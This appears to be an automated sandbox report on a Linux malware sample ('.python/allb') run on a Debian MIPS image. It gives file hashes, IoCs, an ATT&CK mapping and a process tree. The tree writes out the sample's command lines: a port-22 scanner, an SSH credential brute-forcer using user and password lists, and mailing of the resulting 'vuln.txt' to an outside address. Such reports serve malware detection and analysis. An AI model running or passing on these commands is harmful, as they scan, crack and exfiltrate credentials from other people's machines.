285572a9f4a1050d435a6e328f1072f0a27be99b15e3024945ae5f9209999d8a

Analysis

max time kernel
23s
max time network
26s
platform
debian-9_mipsel
resource
debian9-mipsel-20231215-en
resource tags

arch:mipselimage:debian9-mipsel-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
22-12-2023 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.python/allb
Size

1KB
MD5

d8562d823f1531477aed56051c3e616a
SHA1

e5ddd1abb83d031082d713f3b7c8ecb3e19a53d0
SHA256

c96a2a632b23eb6849a539202f995431e9fd5def6cf9a5998419192e2ffb4671
SHA512

ad4b1108d0ff324ec74456ab4d84bfe4cdd2759808ef8fb92a446ace3c1d19956e95b2f8a0896824c13b6c662413dcf0ddb0ca6e333d4366a708f76cb4c87da0

Score

6^/10

Malware Config

Signatures

Reads CPU attributes 1 TTPs 2 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/sys/kernel/ngroups_max	exim4

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/mumGkJ4Z	mail
File opened for modification	/tmp/mu16qJaf	mail

/tmp/.python/allb
/tmp/.python/allb
1⤵
PID:707
- /tmp/.python/c
  ./c 22 -b -i vmbr0 -s 10
  2⤵
  PID:717
- /bin/sleep
  sleep 2
  2⤵
  PID:718
- /tmp/.python/prg
  ./prg -I bios.txt -U user.txt -L pass.txt -o vuln.txt
  2⤵
  PID:726
- /bin/sleep
  sleep 5
  2⤵
  PID:727
- /bin/rm
  rm -rf bios.txt
  2⤵
  PID:728
- /bin/sleep
  sleep 1
  2⤵
  PID:729
- /bin/cat
  cat vuln.txt
  2⤵
  PID:730
- /bin/cat
  cat vuln.txt
  2⤵
  PID:731
- /usr/bin/mail
  mail -s python "[email protected]"
  2⤵
  - Writes file to tmp directory
  PID:732
- - /usr/sbin/sendmail
    /usr/sbin/sendmail -oi -f "root@debian9-mipsel-20231215-en-3" -t
    3⤵
    - Reads runtime system information
    PID:735
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1rGYBq-0000Br-TS
      4⤵
      Reads CPU attributes
      PID:740
    - - /usr/sbin/exim4
        
        /usr/sbin/exim4 -t -oem -oi -f "<>" -E1rGYBq-0000Br-TS
        5⤵
        Reads runtime system information
        
        PID:745
      - /usr/sbin/exim4
        
        /usr/sbin/exim4 -Mc 1rGYBt-0000C1-Sp
        6⤵
        Reads CPU attributes
        
        PID:750

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/mail/user

Filesize
1KB

MD5
a36b466bc0161d30c5ec5022a1f42bdf

SHA1
98ccd2d3d460992bd9cdb1499bdf85f8be6038ba

SHA256
15a7fef2803f57ac759d14f3f8526bce5d796cde39c2e91e48dcd33d9551b8c7

SHA512
dca035ddc756014f0ad9c04cdd125c25b99f482dadc4d3421b40b6b00df7692ec16fd90e30355f18813c59ff8cb1aeb9fe04428a0e1924228f2130647cf4838c

Download Submit
/var/spool/exim4/input/1rGYBq-0000Br-TS-D

Filesize
19B

MD5
9e4a17b3e21ffccf0403a4e3edd3ced9

SHA1
83262c4a72cd33973f96f96f34998e47cb866dc4

SHA256
a55fe87345671f9878aafff1d57ca7e6ed878b93a21dcd4e22a908db0473cda4

SHA512
9cc836a2a8b8127420efbbaeecc7f78418576707bb49c6422d7c645640ff9a490dc709e154c3cbfde806c924b204f77e2a39434ace5d8abe262bf3ae965fa70c

Download Submit
/var/spool/exim4/input/1rGYBt-0000C1-Sp-D

Filesize
1KB

MD5
2475ac1b76a589e214dc0cb7a4c4af4d

SHA1
76f4618c23940c74f36bec6fb537f3cdcdcc97fe

SHA256
ae71da0ef17ca2a87bc7c5b31bc6c0180c7da499dbfbe117aa5026c7a0f2683f

SHA512
2e3c10a56aa8abe0d6ccee9389fc3dd21c712147136dce9d1c71b6d0521027228d9ab56d64dd40bc1d9a721f5180b5a1b6e52bef52b6238691345cc58c8bf36f

Download Submit
/var/spool/exim4/input/1rGYBt-0000C1-Sp-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/hdr.735

Filesize
708B

MD5
136cfe58dc48ba3609b062e1e5e02583

SHA1
2c621491e222bdde94273084bbcc431160da9547

SHA256
f7b0f80609e22fe4c962f55b740d8a28783a22520d64f21a0d5a7c4c525a8898

SHA512
cd54bb8c6efa34e370bda2d50c1d5739db5141f270511f0485e1e76492fecba79e571d59b3b94ad72a4416e390a2118609e5a01626eb51f54191d8c668117a0e

Download Submit
/var/spool/exim4/input/hdr.740

Filesize
724B

MD5
ba082aa77f4602b882f7f60fdb4054cd

SHA1
6e3dd10177299cfa01675f51f80cb4deea5facb2

SHA256
7e8a53b530ccc63a03e4534464338660a4febfd216933917b526787f8dc61f82

SHA512
0990d0121377cfbd7714bb6bd9006842a7c773071bfcfc215b2b66b4119107690b783469f71b683a14142e8d5fbf2aab1cf99d18ffe9c5a2a5debb715e01dffb

Download Submit
/var/spool/exim4/input/hdr.745

Filesize
949B

MD5
f6a8b46cf8ade6e1b3f268c22fe48df7

SHA1
76ede7ead08badcaa0e388554fc026b132844e85

SHA256
26b167611f7b7738bb56b00da9951b07f4fc0a3882e762688c15839ca1703e74

SHA512
bc4877df25b06b9e4f94564dc4dd35e1812863593d7f7e326ffe7f965c5395412aa713aa4ddb8761e67303ebea7b98e025f0471f1cd28ae7ced01b88a2112f10

Download Submit
/var/spool/exim4/msglog/1rGYBq-0000Br-TS

Filesize
89B

MD5
1c681a1ed02c0eb3c8a42c207535782a

SHA1
b96851a5bf21fb24b82d5ab2fe3731ad8070897a

SHA256
06940283c51770020dc6cf0ff03cc85b76e73dde70d7807d13b09244748a8f5a

SHA512
2acdfe9f70ddb6e5a8d6687cf685edf1fb787f3949ea280bb1fe0cd77a77714dd90db866018bbea22c6efaf9f004939ca0bb1504567f05612ca3dbb7bc84f8a2

Download Submit
/var/spool/exim4/msglog/1rGYBq-0000Br-TS

Filesize
177B

MD5
92ba1e5fc323a0b2f434f5cc8d294a8a

SHA1
d85ad719b7825b9adecb2a929bdbde063622631a

SHA256
54b7ba9a9e32db9dd0f221285acdbfd8377bf1ea173c9b2f58977bd7bee83463

SHA512
43381e9e18a51c279721c4ef3c0e1d934774b89d4387a170af6bc146e8b0730dbe2d68f87cc8e0680635da619c6d89a24ec6c0e8988f4f5b938c3260c38e4ea1

Download Submit
/var/spool/exim4/msglog/1rGYBt-0000C1-Sp

Filesize
85B

MD5
b568b1ea047fa528f6c125f9727ab7ec

SHA1
45ee4a9195f04fdbdb7aa381428228770f5092c7

SHA256
82ed786493ca76568268f91efcaa26acecb99c2c5421de017cd6d917351e9ac9

SHA512
e09249dce712930f1117e376d249d0303715d951881c7f176056badce1612db6b66c0bec39a2dfec7d80a22163282953e5b38ef73a40bb45c81a694ed5a835d0

Download Submit
/var/spool/exim4/msglog/1rGYBt-0000C1-Sp

Filesize
284B

MD5
cdbb132a96e974c23338a383f0791fe7

SHA1
93e110b646930aa13ee6a2bedadb701c93924891

SHA256
1cfb6a38a2106a7db39cec07141e4ab2de9d9db208c848b2695ed30dc5f2d521

SHA512
844b3710c52bd3c881123f4e2bf40d56fa1f1f23f2960b308cbd835adfa78ef4f28f08d5cd00b738b53370a9ebbf30bd69b6977108d1b8b64416a3ed3085f9ad

Download Submit